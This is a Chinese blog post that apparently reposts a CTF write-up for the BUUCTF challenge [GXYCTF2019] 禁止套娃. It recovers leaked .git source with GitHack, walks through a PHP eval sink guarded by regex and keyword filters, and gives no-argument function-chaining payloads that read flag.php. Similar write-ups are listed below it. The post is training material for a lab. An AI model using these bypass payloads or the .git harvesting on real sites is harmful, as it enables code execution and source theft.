BUUCTF-WEB-[GXYCTF2019]禁止套娃

最新推荐文章于 2024-02-05 10:47:22 发布
最新推荐文章于 2024-02-05 10:47:22 发布
阅读量427 收藏 3
点赞数 3
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r1727337824/article/details/108293359
版权

.git源码泄露+代码审计

转载大佬的WP
https://blog.csdn.net/weixin_43952190/article/details/107061554

1.打开网址只显示了flag在哪,查看源代码无任何有用信息
2.用御剑也没搜索到后台目录
3.这时候考虑源码泄露
打开网址
http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git
出现403错误

403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。

猜测也许是.git源码泄露,这时候就要用到GitHack.py
在这里插入图片描述
得到index.php源码,打开

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

ok,一步一步分析:

  • 设置参数exp
  • 过滤data,filter,php,phar伪协议

引用一下大佬的伪协议总结
https://blog.csdn.net/nzjdsds/article/details/82461043

  • if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))在得到的exp参数中匹配 [a-z,_]+((?R)?) 并转化为空,注意这里有(?R)?递归调用限制我们传入的参数只能是无参数函数或者是套函数,就是说假如我们传入参数为 exp=system('ls');则匹配不成功,
    假如我们传入exp=print_r(scandir(pos(localeconv())));因为匹配成功所以函数localeconv(),pos(),scandir(),print_r()用NULL替换后为从而可以进入if从句。

(?R)?递归用法:
字符串 :abc123dsf654wre485wer652
传统作法:\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}
递归做法:(\w{3}\d{3}|(?R))*

  • 最后一个if从句过滤了et|na|info|dec|bin|hex|oct|pi|log

函数扩展:
scandir(’.’):扫描当前目录
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
pos(),current():返回数组第一个值

构造payload:

exp=print_r(scandir(pos(localeconv())));

把pos换成current也可以

数组操作函数:

end():数组指针指向最后一位
next(): 数组指针指向下一位
array_reverse(): 将数组颠倒
array_rand(): 随机返回数组的键名
array_flip():交换数组的键和值

读取文件函数

    file_get_content() :因为et被ban,所以不能使用
    readfile()
    highlight_file()
    show_source()

构造payload:

exp=show_source(next(array_reverse(scandir(pos(localeconv())))));//反转数组顺序读取第二个元素内容(这种方法只能读取第二个或倒数第二个)
exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));//随机返回数组的键名

得flag

Y1wan.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[GXYCTF2019]禁止
qq_42728977的博客
12-24 3408
[GXYCTF2019]禁止考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
众星捧月-俄罗斯套游戏开发
06-19
将Cross.txt文本中的的所代表的套重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
BUUCTF-[GXYCTF2019]禁止
yuqie的博客
04-06 236
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
[GXYCTF2019]禁止
qq_64201116的博客
05-30 177
禁止!!!我就套!!!我还要套好几个.....
论剑CTF web-14
m0_46587008的博客
10-25 319
论剑CTF web题14(听说备份不少东西呢) 1.题目 2.思路 首先打开网页没有任何响应,先看源码: 说这是一个假的403,你应该是个擅长发现,所以推测网站还有别的页面,这里用dirsearch扫一下 发现/.git 推测是一个git备份文件泄露,接下来使用GitHack获取git备份 这里给个GitHack连接 https://github.com/lijiejie/GitHack !注意dirsearch的环境是Python3,GitHack的运行环境是Python2(也可以去网上找
[GXYCTF2019]禁止1 不会编程的崽的博客
最新发布
不会编程的崽的博客
02-05 1182
ctf 源码泄露 无参数rce
医学-套状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
医学-套状锰氧化合物纳米晶复合粒子及其制备方法.zip
2010 “中兴捧月”校园程序设计大赛---俄罗斯套源码
05-21
本人写的一个关于俄罗斯套的源程序,其目的是抛砖引玉,欢迎大家分享优质、高效的代码。 经过本人强力测试,可以处理重量为0的。其实这也是这个程序比较难的地方。的重量为0,就表示该路口没有套可以...
HDFView-3.1.2-win10_64-vs16压缩套.zip
03-17
用于 HDF4、HDF5(HDF,Hierarchical Data Format)、.nc(NetCDF,network Common Data Form)等文件的打开预览。
leetcode信封-leetcode:leetcode
06-30
354.俄罗斯套信封问题 2021-01-26: 144.二叉树的前序遍历 94.二叉树的中序遍历 145.二叉树的后序遍历 102.二叉树的层序遍历 104.二叉树的最大深度 112.路径总和 101.对称二叉树 1128.等价多米诺骨牌对的数量 面试...
#WEB-buuctf-禁止 1
weixin_52804141的博客
12-25 148
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
BUUCTF:[GXYCTF2019]禁止
末初的CSDN博客
12-08 1477
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83 .git泄露,使用GitHack index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',
buuctf-[GXYCTF2019]禁止(小宇特详解)
小宇的web博客
02-12 1181
buuctf-[GXYCTF2019]禁止(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
被监督写博客-Day6
veinard_F的博客
10-09 182
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止
web buuctf [GXYCTF2019]禁止1
weixin_44214568的博客
03-24 1711
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
BUUCTF刷题记录(3)
bmth666的博客
03-20 3273
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
[GXYCTF2019] web题-禁止
BROTHERYY的博客
07-28 680
复现环境:buuoj.cn 使用GitHack下载源码index.php 使用 print_r(scandir(current(localeconv())));查看目录 最终完整exp: ?exp=highlight_file(next(array_reverse(scandir(current(localeconv()))))); 用到的函数 print_r() scandir() localeconv() current() next() array_reverse() highlight_file
BUUCTF-WEB菜菜的刷题之路
Pr0m1se1n的博客
07-30 726
BUUCTF平台太棒了,很值得学习鸭!!! 一. GXYCTF 禁止 溜达了一圈,没什么发现。 尝试用dirmap扫目录,发现存在 /.git 浏览器直接访问出现会403 禁止访问。考虑是git源码泄露(常见的源码泄露有.git和.svn) 使用GitHack下载成功 ./index.php 以下是源码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_mat
ctfshow套shell
08-24
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值